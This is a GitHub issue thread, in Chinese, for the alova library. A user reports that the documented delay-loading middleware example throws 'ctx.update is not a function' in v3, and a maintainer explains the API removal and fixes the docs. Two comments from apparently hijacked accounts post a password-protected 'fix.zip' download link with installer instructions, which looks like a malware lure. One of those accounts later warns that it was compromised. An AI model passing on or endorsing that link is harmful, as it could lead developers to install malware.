### ISSUE TITLE
[Bug]: 官网中的延迟Loading示例代码出现错误

### ISSUE THREAD

**Issue by ListenV** [alovajs/alova#520]
### 这是否是一个 Bug？

- [X] 我已经确认这个 Issue 没有被报告过
- [X] 我已经确认我要报告的是一个 Bug

### Alova 版本

3.0.12

### 前端框架

Vue

### 问题描述

官网中的延迟Loading示例代码：

```JS
const delayLoadingMiddleware =
  (delayTimer = 1000) =>
  async (ctx, next) => {
    // 自行控制loading
    ctx.controlLoading();

    // 延迟特定时间更新
    const timer = setTimeout(() => {
      ctx.update({ loading: true });
    }, delayTimer);
    await next();
    ctx.update({ loading: false });
    clearTimeout(timer);
  };

useRequest(methodInstance, {
  middleware: delayLoadingMiddleware()
});
```

页面：https://alova.js.org/zh-CN/tutorial/project/best-practice/middleware/

控制台报错：

```
Uncaught (in promise) TypeError: ctx.update is not a function

Uncaught TypeError: ctx.update is not a function
```

我的代码与示例代码一致

### 期望的表现

正常

### 复现步骤

一个普通的请求即可复现

### 系统信息

```shell
System:
    OS: Windows 11 10.0.22631
    CPU: (16) x64 AMD Ryzen 7 4800H with Radeon Graphics
    Memory: 3.20 GB / 15.42 GB
  Binaries:
    Node: 20.16.0 - D:\Development\Scoop\apps\nodejs-lts\current\node.EXE
    npm: 10.8.1 - D:\Development\Scoop\apps\nodejs-lts\current\npm.CMD
    pnpm: 9.7.0 - D:\Development\Scoop\shims\pnpm.EXE
  Browsers:
    Edge: Chromium (127.0.2651.74)
    Internet Explorer: 11.0.22621.3527
  npmPackages:
    alova: ^3.0.12 => 3.0.12
    vue: ^3.4.38 => 3.4.38
```

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MeetinaXD** [comment]
感谢反馈问题！middleware 中context.update 函数在 3.0 版本开始被移除，详情：[v3 升级指南](https://alova.js.org/zh-CN/tutorial/project/migration/v2-to-v3)

我们在文档中遗漏了这一点，稍后会进行修正。简而言之，你可以使用 proxyState 来实现该效果 😃

**Comment by MeetinaXD** [comment]
已修正。

**Comment by nxllxvxxd** [comment]
# **不要下载我作为评论发布的任何内容，我的账户已被入侵，并被用来入侵他人的账户**。

**我正在努力删除并在他们使用我的账户发布此内容的所有主题上发布此内容**。
